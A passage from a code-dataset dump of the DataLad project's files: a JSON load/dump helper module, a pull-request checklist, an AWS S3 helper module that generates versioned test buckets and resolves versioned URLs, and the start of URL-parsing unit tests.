indent=None,\n separators=(',', ':'))\n\n\n# Let's just reuse top level one for now\nfrom ..log import lgr\n\n\ndef dump(obj, fname, compressed=False):\n \"\"\"Dump a JSON-serializable objects into a file\n\n Parameters\n ----------\n obj : object\n Structure to serialize.\n fname : str\n Name of the file to dump into.\n compressed : bool\n Flag whether to use LZMA compression for file content.\n \"\"\"\n\n _open = LZMAFile if compressed else io.open\n\n indir = dirname(fname)\n if not exists(indir):\n makedirs(indir)\n if lexists(fname):\n os.unlink(fname)\n with _open(fname, 'wb') as f:\n return dump2fileobj(\n obj,\n f,\n **(compressed_json_dump_kwargs if compressed else json_dump_kwargs)\n )\n\n\ndef dump2fileobj(obj, fileobj, **kwargs):\n \"\"\"Dump a JSON-serializable objects into a file-like\n\n Parameters\n ----------\n obj : object\n Structure to serialize.\n fileobj : file\n Writeable file-like object to dump into.\n **kwargs\n Keyword arguments to be passed on to simplejson.dump()\n \"\"\"\n return json.dump(\n obj,\n codecs.getwriter('utf-8')(fileobj),\n **kwargs)\n\n\ndef LZMAFile(*args, **kwargs):\n \"\"\"A little decorator to overcome a bug in lzma\n\n A unique to yoh and some others bug with pyliblzma\n calling dir() helps to avoid AttributeError __exit__\n see https://bugs.launchpad.net/pyliblzma/+bug/1219296\n \"\"\"\n import lzma\n lzmafile = lzma.LZMAFile(*args, **kwargs)\n dir(lzmafile)\n return lzmafile\n\n\ndef dump2stream(obj, fname, compressed=False):\n\n _open = LZMAFile if compressed else open\n\n indir = dirname(fname)\n\n if op.lexists(fname):\n os.remove(fname)\n elif indir and not exists(indir):\n makedirs(indir)\n with _open(fname, mode='wb') as f:\n jwriter = codecs.getwriter('utf-8')(f)\n for o in obj:\n json.dump(o, jwriter, **compressed_json_dump_kwargs)\n f.write(b'\\n')\n\n\ndef dump2xzstream(obj, fname):\n dump2stream(obj, fname, compressed=True)\n\n\ndef load_stream(fname, compressed=None):\n with _suitable_open(fname, compressed)(fname, mode='rb') as f:\n jreader = codecs.getreader('utf-8')(f)\n cont_line = u''\n for line in jreader:\n if not line.endswith('\\n'):\n cont_line += line\n continue\n if cont_line:\n cont_line += line\n else:\n cont_line = line\n yield loads(cont_line)\n cont_line = u''\n if cont_line: # The last line didn't end with a new line.\n yield loads(cont_line)\n\n\ndef loads(s, *args, **kwargs):\n \"\"\"Helper to log actual value which failed to be parsed\"\"\"\n try:\n return json.loads(s, *args, **kwargs)\n except:\n lgr.error(\n \"Failed to load content from %r with args=%r kwargs=%r\"\n % (s, args, kwargs)\n )\n raise\n\n\ndef load(fname, fixup=True, compressed=None, **kw):\n \"\"\"Load JSON from a file, possibly fixing it up if initial load attempt fails\n\n Parameters\n ----------\n fixup : bool\n In case of failed load, apply a set of fixups with hope to resolve issues\n in JSON\n compressed : bool or None\n Flag whether to treat the file as XZ compressed. If None, this decision\n is made automatically based on the presence of a '.xz' extension in the\n filename\n **kw\n Passed into the load (and loads after fixups) function\n \"\"\"\n with _suitable_open(fname, compressed)(fname, 'rb') as f:\n try:\n jreader = codecs.getreader('utf-8')(f)\n return json.load(jreader, **kw)\n except json.JSONDecodeError as exc:\n if not fixup:\n raise\n ce = CapturedException(exc)\n lgr.warning(\n \"Failed to decode content in %s: %s. 
Trying few tricks\",\n fname, ce)\n\n # Load entire content and replace common \"abusers\" which break JSON\n # comprehension but in general\n # are Ok\n with _suitable_open(fname)(fname,'rb') as f:\n s_orig = s = codecs.getreader('utf-8')(f).read()\n\n for o, r in {\n u\"\\xa0\": \" \", # non-breaking space\n }.items():\n s = s.replace(o, r)\n\n if s == s_orig:\n # we have done nothing, so just reraise previous exception\n raise\n return loads(s, **kw)\n\n\ndef _suitable_open(fname, compressed=None):\n \"\"\"Helper to return an appropriate open() implementation for a JSON file\n\n Parameters\n ----------\n fname: str\n The target file name which will be inspected for a '.xz' extension when\n compressed is None.\n compressed: None or bool, optional\n If not None, determined when the return function will be capable of\n (de)compression. If None, this will be guessed from the file name.\n\n Returns\n -------\n LZMAFile or io.open\n LZMAFile is returned when (de)compression is requested, or the file name\n suggests a compressed file.\n \"\"\"\n return LZMAFile \\\n if compressed or compressed is None and fname.endswith('.xz') \\\n else io.open\n" }, { "alpha_fraction": 0.7328159809112549, "alphanum_fraction": 0.7328159809112549, "avg_line_length": 74.16666412353516, "blob_id": "6f0a4ff5ccbb62991a0154ab0358b135b309d878", "content_id": "3bffa87936b573800dbabce14ace38eded49f0be", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": true, "language": "Markdown", "length_bytes": 902, "license_type": "permissive", "max_line_length": 141, "num_lines": 12, "path": "/.github/PULL_REQUEST_TEMPLATE.md", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "### PR checklist\n\n- [ ] Provide an overview of the changes you're making and explain why you're proposing them.\n- [ ] Create a changelog snippet (add the `CHANGELOG-missing` label to this pull request in order to have a snippet generated from its title;\n or use `scriv create` locally and include the generated file in the pull request, see [scriv](https://scriv.readthedocs.io/)).\n- [ ] Include `Fixes #NNN` somewhere in the description and `scriv` changelog entry if this PR addresses an existing issue.\n- [ ] If this PR is not complete, select \"Create Draft Pull Request\" in the pull request button's menu.\n Consider using a task list (e.g., `- [ ] add tests ...`) to indicate remaining to-do items.\n- [ ] If you would like to list yourself as a DataLad contributor and your name is not mentioned please modify .zenodo.json file.\n- [ ] **Delete these instructions**. 
:-)\n\nThanks for contributing!\n" }, { "alpha_fraction": 0.6020413041114807, "alphanum_fraction": 0.6111363768577576, "avg_line_length": 34.15275192260742, "blob_id": "a20fc7fa7dd0bb61b251745e90f94174dc1ec346", "content_id": "f0c00426ea4ae3a71dd51e54f82728f58735eb9f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19803, "license_type": "permissive", "max_line_length": 141, "num_lines": 563, "path": "/datalad/support/s3.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##g\n\"\"\"Variety of helpers to deal with AWS S3\n\nUse as a script to generate test buckets via e.g.\n\n python -m datalad.support.s3 generate test1_dirs\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport mimetypes\n\nfrom os.path import splitext\nimport re\n\nfrom datalad.support.network import urlquote, URL\n\nimport logging\nimport datalad.log # Just to have lgr setup happen this one used a script\nlgr = logging.getLogger('datalad.s3')\n\nfrom datalad.support.exceptions import (\n CapturedException,\n DownloadError,\n AccessDeniedError,\n AccessPermissionExpiredError,\n AnonymousAccessDeniedError,\n)\nfrom datalad.utils import try_multiple_dec\n\nfrom urllib.request import urlopen, Request\n\n\ntry:\n import boto\n from boto.s3.key import Key\n from boto.exception import S3ResponseError\n from boto.s3.connection import OrdinaryCallingFormat\nexcept Exception as e:\n if not isinstance(e, ImportError):\n lgr.warning(\n \"boto module failed to import although available: %s\",\n CapturedException(e))\n boto = Key = S3ResponseError = OrdinaryCallingFormat = None\n\n\n# TODO: should become a config option and managed along with the rest\nS3_ADMIN_CREDENTIAL = \"datalad-datalad-admin-s3\"\nS3_TEST_CREDENTIAL = \"datalad-datalad-test-s3\"\n\n\ndef _get_bucket_connection(credential):\n # eventually we should be able to have multiple credentials associated\n # with different resources. Thus for now just making an option which\n # one to use\n # do full shebang with entering credentials\n from datalad.downloaders.credentials import AWS_S3\n credential = AWS_S3(credential, None)\n if not credential.is_known:\n credential.enter_new()\n creds = credential()\n return boto.connect_s3(creds[\"key_id\"], creds[\"secret_id\"])\n\n\ndef _handle_exception(e, bucket_name):\n \"\"\"Helper to handle S3 connection exception\"\"\"\n raise (\n AccessDeniedError\n if e.error_code == 'AccessDenied'\n else DownloadError)(\n \"Cannot connect to %s S3 bucket.\"\n % (bucket_name)\n ) from e\n\n\ndef _check_S3ResponseError(e):\n \"\"\"Returns True if should be retried.\n\n raises ... if token has expired\"\"\"\n # https://docs.aws.amazon.com/AmazonS3/latest/API/ErrorResponses.html#ErrorCodeList\n if e.status in (\n 307, # MovedTemporarily -- DNS updates etc\n 503, # Slow down -- too many requests, so perfect fit to sleep a bit\n ):\n return True\n if e.status == 400:\n # Generic Bad Request -- could be many things! 
generally -- we retry, but\n # some times provide more directed reaction\n # ATM, as used, many requests we send with boto might be just HEAD requests\n # (if I got it right) and we would not receive BODY back with the detailed\n # error_code. Then we will allow to retry until we get something we know how to\n # handle it more specifically\n if e.error_code == 'ExpiredToken':\n raise AccessPermissionExpiredError(\n \"Used token to access S3 has expired\") from e\n elif not e.error_code:\n lgr.log(5, \"Empty error_code in %s\", e)\n return True\n return False\n\n\ndef try_multiple_dec_s3(func):\n \"\"\"An S3 specific adapter to @try_multiple_dec\n\n To decorate func to try multiple times after some sleep upon encountering\n some intermittent error from S3\n \"\"\"\n return try_multiple_dec(\n ntrials=4,\n duration=2.,\n increment_type='exponential',\n exceptions=S3ResponseError,\n exceptions_filter=_check_S3ResponseError,\n logger=lgr.debug,\n )(func)\n\n\ndef get_bucket(conn, bucket_name):\n \"\"\"A helper to get a bucket\n\n Parameters\n ----------\n bucket_name: str\n Name of the bucket to connect to\n \"\"\"\n try:\n return try_multiple_dec_s3(conn.get_bucket)(bucket_name)\n except S3ResponseError as e:\n ce = CapturedException(e)\n # can initially deny or error to connect to the specific bucket by name,\n # and we would need to list which buckets are available under following\n # credentials:\n lgr.debug(\"Cannot access bucket %s by name with validation: %s\",\n bucket_name, ce)\n if conn.anon:\n raise AnonymousAccessDeniedError(\n \"Access to the bucket %s did not succeed. Requesting \"\n \"'all buckets' for anonymous S3 connection makes \"\n \"little sense and thus not supported.\" % bucket_name,\n supported_types=['aws-s3']\n )\n\n if e.reason == \"Forbidden\":\n # Could be just HEAD call boto issues is not allowed, and we should not\n # try to verify that bucket is \"reachable\". 
Just carry on\n try:\n return try_multiple_dec_s3(conn.get_bucket)(bucket_name, validate=False)\n except S3ResponseError as e2:\n lgr.debug(\"Cannot access bucket %s even without validation: %s\",\n bucket_name, CapturedException(e2))\n _handle_exception(e, bucket_name)\n\n try:\n all_buckets = try_multiple_dec_s3(conn.get_all_buckets)()\n all_bucket_names = [b.name for b in all_buckets]\n lgr.debug(\"Found following buckets %s\", ', '.join(all_bucket_names))\n if bucket_name in all_bucket_names:\n return all_buckets[all_bucket_names.index(bucket_name)]\n except S3ResponseError as e2:\n lgr.debug(\"Cannot access all buckets: %s\", CapturedException(e2))\n _handle_exception(e, 'any (originally requested %s)' % bucket_name)\n else:\n _handle_exception(e, bucket_name)\n\n\nclass VersionedFilesPool(object):\n \"\"\"Just a helper which would help to create versioned files in the bucket\"\"\"\n def __init__(self, bucket):\n self._versions = {}\n self._bucket = bucket\n\n @property\n def bucket(self):\n return self._bucket\n\n def __call__(self, filename, prefix='', load=None):\n self._versions[filename] = version = self._versions.get(filename, 0) + 1\n version_str = \"version%d\" % version\n # if we are to upload fresh content\n k = Key(self._bucket)\n k.key = filename\n #k.set_contents_from_filename('/home/yoh/.emacs')\n base, ext = splitext(filename)\n #content_type = None\n mtype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'\n headers = {'Content-Type': mtype}\n\n if load is None:\n load = prefix\n if ext == 'html':\n load += '<html><body>%s</body></html>' % version_str\n else:\n load += version_str\n\n k.set_contents_from_string(load, headers=headers)\n return k\n\n def reset_version(self, filename):\n self._versions[filename] = 0\n\n\ndef get_key_url(e, schema='http', versioned=True):\n \"\"\"Generate an s3:// or http:// url given a key\n\n if versioned url is requested but version_id is None, no versionId suffix\n will be added\n \"\"\"\n # TODO: here we would need to encode the name since urlquote actually\n # can't do that on its own... but then we should get a copy of the thing\n # so we could still do the .format....\n # ... 
= e.name.encode('utf-8') # unicode isn't advised in URLs\n e.name_urlquoted = urlquote(e.name)\n if schema == 'http':\n fmt = \"http://{e.bucket.name}.s3.amazonaws.com/{e.name_urlquoted}\"\n elif schema == 's3':\n fmt = \"s3://{e.bucket.name}/{e.name_urlquoted}\"\n else:\n raise ValueError(schema)\n if versioned and e.version_id is not None:\n fmt += \"?versionId={e.version_id}\"\n return fmt.format(e=e)\n\n\ndef prune_and_delete_bucket(bucket):\n \"\"\"Deletes all the content and then deletes bucket\n\n Should be used with care -- no confirmation requested\n \"\"\"\n bucket.delete_keys(bucket.list_versions(''))\n # this one doesn't work since it generates DeleteMarkers instead ;)\n #for key in b.list_versions(''):\n # b.delete_key(key)\n bucket.delete()\n lgr.info(\"Bucket %s was removed\", bucket.name)\n\n\ndef set_bucket_public_access_policy(bucket):\n # we need to enable permissions for making content available\n bucket.set_policy(\"\"\"{\n \"Version\":\"2012-10-17\",\n \"Statement\":[{\n \"Sid\":\"AddPerm\",\n \"Effect\":\"Allow\",\n \"Principal\": \"*\",\n \"Action\":[\"s3:GetObject\", \"s3:GetObjectVersion\", \"s3:GetObjectTorrent\", \"s3:GetObjectVersionTorrent\"],\n \"Resource\":[\"arn:aws:s3:::%s/*\"]\n }\n ]\n }\"\"\" % bucket.name)\n\n\ndef gen_test_bucket(bucket_name):\n conn = _get_bucket_connection(S3_ADMIN_CREDENTIAL)\n # assure we have none\n try:\n bucket = conn.get_bucket(bucket_name)\n lgr.info(\"Deleting existing bucket %s\", bucket.name)\n prune_and_delete_bucket(bucket)\n except: # MIH: MemoryError?\n # so nothing to worry about\n pass\n finally:\n pass\n\n return conn.create_bucket(bucket_name)\n\n\ndef _gen_bucket_test0(bucket_name=\"datalad-test0\", versioned=True):\n\n bucket = gen_test_bucket(bucket_name)\n\n # Enable web access to that bucket to everyone\n bucket.configure_website('index.html')\n set_bucket_public_access_policy(bucket)\n\n files = VersionedFilesPool(bucket)\n\n files(\"1version-nonversioned1.txt\")\n files(\"2versions-nonversioned1.txt\")\n\n if versioned:\n # make bucket versioned AFTER we uploaded one file already\n bucket.configure_versioning(True)\n\n files(\"2versions-nonversioned1.txt\")\n files(\"2versions-nonversioned1.txt_sameprefix\")\n for v in range(3):\n files(\"3versions-allversioned.txt\")\n files(\"3versions-allversioned.txt_sameprefix\") # to test possible problems\n\n # File which was created and then removed\n bucket.delete_key(files(\"1version-removed.txt\"))\n\n # File which was created/removed/recreated (with new content)\n bucket.delete_key(files(\"2versions-removed-recreated.txt\"))\n files(\"2versions-removed-recreated.txt\")\n files(\"2versions-removed-recreated.txt_sameprefix\")\n\n # File which was created/removed/recreated (with new content)\n f = \"1version-removed-recreated.txt\"\n bucket.delete_key(files(f))\n files.reset_version(f)\n files(f)\n lgr.info(\"Bucket %s was generated and populated\", bucket_name)\n\n return bucket\n\n\ndef gen_bucket_test0_versioned():\n return _gen_bucket_test0('datalad-test0-versioned', versioned=True)\n\n\ndef gen_bucket_test0_nonversioned():\n return _gen_bucket_test0('datalad-test0-nonversioned', versioned=False)\n\n\ndef gen_bucket_test1_dirs():\n bucket_name = 'datalad-test1-dirs-versioned'\n bucket = gen_test_bucket(bucket_name)\n bucket.configure_versioning(True)\n\n # Enable web access to that bucket to everyone\n bucket.configure_website('index.html')\n set_bucket_public_access_policy(bucket)\n\n files = VersionedFilesPool(bucket)\n\n files(\"d1\", load=\"\") # creating an 
empty file\n # then we would like to remove that d1 as a file and make a directory out of it\n files(\"d1/file1.txt\")\n # and then delete it and place it back\n files(\"d1\", load=\"smth\")\n\n\ndef gen_bucket_test2_obscurenames_versioned():\n # in principle bucket name could also contain ., but boto doesn't digest it\n # well\n bucket_name = 'datalad-test2-obscurenames-versioned'\n bucket = gen_test_bucket(bucket_name)\n bucket.configure_versioning(True)\n\n # Enable web access to that bucket to everyone\n bucket.configure_website('index.html')\n set_bucket_public_access_policy(bucket)\n\n files = VersionedFilesPool(bucket)\n\n # http://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html\n files(\"f 1\", load=\"\")\n files(\"f [1][2]\")\n # Need to grow up for this .... TODO\n #files(u\"юникод\")\n #files(u\"юни/код\")\n # all fancy ones at once\n files(\"f!-_.*'( )\")\n # the super-fancy which aren't guaranteed to be good idea (as well as [] above)\n files(\"f &$=@:+,?;\")\n\n\ndef gen_bucket_test1_manydirs():\n # to test crawling with flexible subdatasets making decisions\n bucket_name = 'datalad-test1-manydirs-versioned'\n bucket = gen_test_bucket(bucket_name)\n bucket.configure_versioning(True)\n\n # Enable web access to that bucket to everyone\n bucket.configure_website('index.html')\n set_bucket_public_access_policy(bucket)\n\n files = VersionedFilesPool(bucket)\n\n files(\"d1\", load=\"\") # creating an empty file\n # then we would like to remove that d1 as a file and make a directory out of it\n files(\"d1/file1.txt\")\n files(\"d1/sd1/file1.txt\")\n files(\"d1/sd2/file3.txt\", load=\"a\")\n files(\"d1/sd2/ssd1/file4.txt\")\n files(\"d2/file1.txt\")\n files(\"d2/sd1/file1.txt\")\n files(\"d2/sd1/ssd/sssd/file1.txt\")\n\n\ndef add_version_to_url(url, version, replace=False):\n \"\"\"Add a version ID to `url`.\n\n Parameters\n ----------\n url : datalad.support.network.URL\n A URL.\n version : str\n The value of 'versionId='.\n replace : boolean, optional\n If a versionID is already present in `url`, replace it.\n\n Returns\n -------\n A versioned URL (str)\n \"\"\"\n version_id = \"versionId={}\".format(version)\n if not url.query:\n query = version_id\n else:\n ver_match = re.match(\"(?P<pre>.*&)?\"\n \"(?P<vers>versionId=[^&]+)\"\n \"(?P<post>&.*)?\",\n url.query)\n if ver_match:\n if replace:\n query = \"\".join([ver_match.group(\"pre\") or \"\",\n version_id,\n ver_match.group(\"post\") or \"\"])\n else:\n query = url.query\n else:\n query = url.query + \"&\" + version_id\n return URL(**dict(url.fields, query=query)).as_str()\n\n\ndef get_versioned_url(url, guarantee_versioned=False, return_all=False, verify=False,\n s3conn=None, update=False):\n \"\"\"Given a url return a versioned URL\n\n Originally targeting AWS S3 buckets with versioning enabled\n\n Parameters\n ----------\n url : string\n guarantee_versioned : bool, optional\n Would fail if buckets is determined to have no versioning enabled.\n It will not fail if we fail to determine if bucket is versioned or\n not\n return_all: bool, optional\n If True, would return a list with URLs for all the versions of this\n file, sorted chronologically with latest first (when possible, e.g.\n for S3). Remove markers get ignored\n verify: bool, optional\n Verify that URL is accessible. As discovered some versioned keys might\n be denied access to\n update : bool, optional\n If the URL already contains a version ID, update it to the latest version\n ID. 
This option has no effect if return_all is true.\n\n Returns\n -------\n string or list of string\n \"\"\"\n url_rec = URL(url)\n\n s3_bucket, fpath = None, url_rec.path.lstrip('/')\n\n was_versioned = False\n all_versions = []\n\n if url_rec.hostname.endswith('.s3.amazonaws.com'):\n if url_rec.scheme not in ('http', 'https'):\n raise ValueError(\"Do not know how to handle %s scheme\" % url_rec.scheme)\n # bucket name could have . in it, e.g. openneuro.org\n s3_bucket = url_rec.hostname[:-len('.s3.amazonaws.com')]\n elif url_rec.hostname == 's3.amazonaws.com':\n if url_rec.scheme not in ('http', 'https'):\n raise ValueError(\"Do not know how to handle %s scheme\" % url_rec.scheme)\n # url is s3.amazonaws.com/bucket/PATH\n s3_bucket, fpath = fpath.split('/', 1)\n elif url_rec.scheme == 's3':\n s3_bucket = url_rec.hostname # must be\n if url_rec.query and 'versionId=' in url_rec.query:\n was_versioned = True\n all_versions.append(url)\n else:\n # and for now implement magical conversion to URL\n # TODO: wouldn't work if needs special permissions etc\n # actually for now\n raise NotImplementedError\n\n if s3_bucket:\n # TODO: cache\n if s3conn is None:\n # we need to reuse our providers\n from ..downloaders.providers import Providers\n providers = Providers.from_config_files()\n s3url = \"s3://%s/\" % s3_bucket\n s3provider = providers.get_provider(s3url)\n authenticator = s3provider.authenticator\n if not authenticator:\n # We will use anonymous one\n from ..downloaders.s3 import S3Authenticator\n authenticator = S3Authenticator()\n if authenticator.bucket is not None and authenticator.bucket.name == s3_bucket:\n # we have established connection before, so let's just reuse\n bucket = authenticator.bucket\n else:\n bucket = authenticator.authenticate(s3_bucket, s3provider.credential) # s3conn or _get_bucket_connection(S3_TEST_CREDENTIAL)\n else:\n bucket = s3conn.get_bucket(s3_bucket)\n\n supports_versioning = True # assume that it does\n try:\n supports_versioning = bucket.get_versioning_status() # TODO cache\n except S3ResponseError as e:\n # might be forbidden, i.e. 
\"403 Forbidden\" so we try then anyways\n supports_versioning = 'maybe'\n\n if supports_versioning:\n all_keys = bucket.list_versions(fpath)\n # Filter and sort them so the newest one on top\n all_keys = [x for x in sorted(all_keys, key=lambda x: (x.last_modified, x.is_latest))\n if ((x.name == fpath) # match exact name, not just prefix\n )\n ][::-1]\n # our current assumptions\n assert(all_keys[0].is_latest)\n # and now filter out delete markers etc\n all_keys = [x for x in all_keys if isinstance(x, Key)] # ignore DeleteMarkers\n assert(all_keys)\n\n for key in all_keys:\n url_versioned = add_version_to_url(\n url_rec, key.version_id, replace=update and not return_all)\n\n all_versions.append(url_versioned)\n if verify:\n # it would throw HTTPError exception if not accessible\n _ = urlopen(Request(url_versioned))\n was_versioned = True\n if not return_all:\n break\n\n if guarantee_versioned and not was_versioned:\n raise RuntimeError(\"Could not version %s\" % url)\n\n if not all_versions:\n # we didn't get a chance\n all_versions = [url_rec.as_str()]\n\n if return_all:\n return all_versions\n else:\n return all_versions[0]\n\n\nif __name__ == '__main__':\n import sys\n lgr.setLevel(logging.INFO)\n # TODO: proper cmdline\n if len(sys.argv) > 1 and sys.argv[1] == \"generate\":\n if len(sys.argv) < 3:\n raise ValueError(\"Say 'all' to regenerate all, or give a generators name\")\n name = sys.argv[2]\n if name.lower() == 'all':\n for f in locals().keys():\n if f.startswith('gen_bucket_'):\n locals()[f]()\n else:\n locals()['gen_bucket_%s' % name]()\n else:\n print(\"nothing todo\")\n" }, { "alpha_fraction": 0.5759270787239075, "alphanum_fraction": 0.5970732569694519, "avg_line_length": 39.59720230102539, "blob_id": "5169a78c2efe47fc6416415b5bd1e992fe5bfd82", "content_id": "a64df33fd30f98e8bc32e9cb90d9a6425dcf7b98", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26104, "license_type": "permissive", "max_line_length": 146, "num_lines": 643, "path": "/datalad/support/tests/test_network.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nimport os\nimport tempfile\nfrom os.path import isabs\nfrom os.path import join as opj\n\nimport pytest\n\nimport datalad.support.network\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.network import (\n RI,\n SSHRI,\n URL,\n DataLadRI,\n GitTransportRI,\n PathRI,\n _split_colon,\n dlurljoin,\n get_local_file_url,\n get_response_disposition_filename,\n get_tld,\n get_url_straight_filename,\n is_datalad_compat_ri,\n is_ssh,\n is_url,\n iso8601_to_epoch,\n local_path_representation,\n local_path2url_path,\n local_url_path_representation,\n parse_url_opts,\n quote_path,\n same_website,\n urlquote,\n url_path2local_path,\n)\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_in,\n assert_raises,\n assert_status,\n eq_,\n get_most_obscure_supported_name,\n known_failure_githubci_win,\n neq_,\n nok_,\n ok_,\n skip_if,\n swallow_logs,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n PurePosixPath,\n 
on_windows,\n)\n\n\ndef test_same_website():\n ok_(same_website(\"http://a.b\", \"http://a.b/2014/01/xxx/\"))\n ok_(same_website(\"http://a.b/page/2/\", \"http://a.b/2014/01/xxx/\"))\n ok_(same_website(\"https://a.b/page/2/\", \"http://a.b/2014/01/xxx/\"))\n ok_(same_website(\"http://a.b/page/2/\", \"https://a.b/2014/01/xxx/\"))\n\n\ndef test_get_tld():\n eq_(get_tld('http://example.com'), 'example.com')\n eq_(get_tld('http://example.com/1'), 'example.com')\n eq_(get_tld('http://example.com/1/2'), 'example.com')\n eq_(get_tld('example.com/1/2'), 'example.com')\n eq_(get_tld('s3://example.com/1/2'), 'example.com')\n assert_raises(ValueError, get_tld, \"\")\n assert_raises(ValueError, get_tld, \"s3://\")\n assert_raises(ValueError, get_tld, \"http://\")\n\ndef test_dlurljoin():\n eq_(dlurljoin('http://a.b/', 'f'), 'http://a.b/f')\n eq_(dlurljoin('http://a.b/page', 'f'), 'http://a.b/f')\n eq_(dlurljoin('http://a.b/dir/', 'f'), 'http://a.b/dir/f')\n eq_(dlurljoin('http://a.b/dir/', 'http://url'), 'http://url')\n eq_(dlurljoin('http://a.b/dir/', '/'), 'http://a.b/')\n eq_(dlurljoin('http://a.b/dir/', '/x/y'), 'http://a.b/x/y')\n\[email protected](\"suf\", [\n '',\n '#',\n '#tag',\n '#tag/obscure',\n '?param=1',\n '?param=1&another=/',\n])\ndef test_get_url_straight_filename(suf):\n eq_(get_url_straight_filename('http://a.b/' + suf), '')\n eq_(get_url_straight_filename('http://a.b/p1' + suf), 'p1')\n eq_(get_url_straight_filename('http://a.b/p1/' + suf), '')\n eq_(get_url_straight_filename('http://a.b/p1/' + suf, allowdir=True), 'p1')\n eq_(get_url_straight_filename('http://a.b/p1/p2' + suf), 'p2')\n eq_(get_url_straight_filename('http://a.b/p1/p2/' + suf), '')\n eq_(get_url_straight_filename('http://a.b/p1/p2/' + suf, allowdir=True), 'p2')\n eq_(get_url_straight_filename('http://a.b/p1/p2/' + suf, allowdir=True, strip=('p2', 'xxx')), 'p1')\n eq_(get_url_straight_filename('http://a.b/p1/p2/' + suf, strip=('p2', 'xxx')), '')\n\nfrom ..network import rfc2822_to_epoch\n\n\ndef test_rfc2822_to_epoch():\n eq_(rfc2822_to_epoch(\"Thu, 16 Oct 2014 01:16:17 EDT\"), 1413436577)\n\n\ndef test_get_response_disposition_filename():\n eq_(get_response_disposition_filename('attachment;filename=\"Part1-Subjects1-99.tar\"'), \"Part1-Subjects1-99.tar\")\n eq_(get_response_disposition_filename('attachment'), None)\n\n\ndef test_parse_url_opts():\n url = 'http://map.org/api/download/?id=157'\n output = parse_url_opts(url)\n eq_(output, ('http://map.org/api/download/', {'id': '157'}))\n\n url = 's3://bucket/save/?key=891'\n output = parse_url_opts(url)\n eq_(output, ('s3://bucket/save/', {'key': '891'}))\n\n url = 'http://map.org/api/download/?id=98&code=13'\n output = parse_url_opts(url)\n eq_(output, ('http://map.org/api/download/', {'id': '98', 'code': '13'}))\n\n\ndef test_split_colon():\n eq_(_split_colon('a:b'), ['a', 'b'])\n eq_(_split_colon('a:b:c'), ['a', 'b:c'])\n eq_(_split_colon('a:b:c', 2), ['a', 'b', 'c'])\n eq_(_split_colon('ab'), ['ab'])\n eq_(_split_colon(r'a\\:b'), [r'a\\:b'])\n\n\ndef test_url_eq():\n assert URL() == URL()\n # doesn't make sense to ask what kind of a url it is an empty URL\n assert URL() != URL(hostname='x')\n # Different types aren't equal even if have the same fields values\n assert URL(path='x') != PathRI(path='x')\n assert URL(hostname='x') != SSHRI(hostname='x')\n assert str(URL(hostname='x')) != str(SSHRI(hostname='x'))\n\n\ndef _check_ri(ri, cls, exact_str=True, localpath=None, **fields):\n \"\"\"just a helper to carry out few checks on urls\"\"\"\n with 
swallow_logs(new_level=logging.DEBUG) as cml:\n ri_ = cls(**fields)\n murl = RI(ri)\n assert murl.__class__ == cls # not just a subclass\n assert murl == ri_\n if isinstance(ri, str):\n assert str(RI(ri)) == ri\n assert eval(repr(ri_)) == ri # repr leads back to identical ri_\n assert ri == ri_ # just in case ;) above should fail first if smth is wrong\n if not exact_str:\n assert_in('Parsed version of', cml.out)\n if exact_str:\n assert str(ri) == str(ri_)\n else:\n assert str(ri) != str(ri_)\n\n # and that we have access to all those fields\n nok_(set(fields).difference(set(cls._FIELDS)))\n for f, v in fields.items():\n assert getattr(ri_, f) == v\n\n if localpath:\n if cls == URL:\n local_representation = local_url_path_representation(localpath)\n else:\n local_representation = local_path_representation(localpath)\n assert ri_.localpath == local_representation\n old_localpath = ri_.localpath # for a test below\n else:\n # if not given -- must be a remote url, should raise exception on\n # non-Windows systems. But not on Windows systems because we allow UNCs\n # to be encoded in URLs\n if not on_windows:\n with assert_raises(ValueError):\n ri_.localpath\n\n # This one does not have a path. TODO: either proxy path from its .RI or adjust\n # hierarchy of classes to make it more explicit\n if cls == GitTransportRI:\n return\n # do changes in the path persist?\n old_str = str(ri_)\n ri_.path = newpath = opj(ri_.path, 'sub')\n assert ri_.path == newpath\n assert str(ri_) != old_str\n if localpath:\n assert ri_.localpath == local_path_representation(opj(old_localpath, 'sub'))\n\n\ndef test_url_base():\n # Basic checks\n assert_raises(ValueError, URL, \"http://example.com\", hostname='example.com')\n url = URL(\"http://example.com\")\n eq_(url.hostname, 'example.com')\n eq_(url.scheme, 'http')\n eq_(url.port, '') # not specified -- empty strings\n eq_(url.username, '') # not specified -- empty strings\n eq_(repr(url), \"URL(hostname='example.com', netloc='example.com', scheme='http')\")\n eq_(url, \"http://example.com\") # automagic coercion in __eq__\n\n neq_(URL(), URL(hostname='x'))\n\n smth = URL('smth')\n eq_(smth.hostname, '')\n ok_(bool(smth))\n nok_(bool(URL()))\n\n assert_raises(ValueError, url._set_from_fields, unknown='1')\n\n with swallow_logs(new_level=logging.WARNING) as cml:\n # we don't \"care\" about params ATM so there is a warning if there are any\n purl = URL(\"http://example.com/;param\")\n eq_(str(purl), 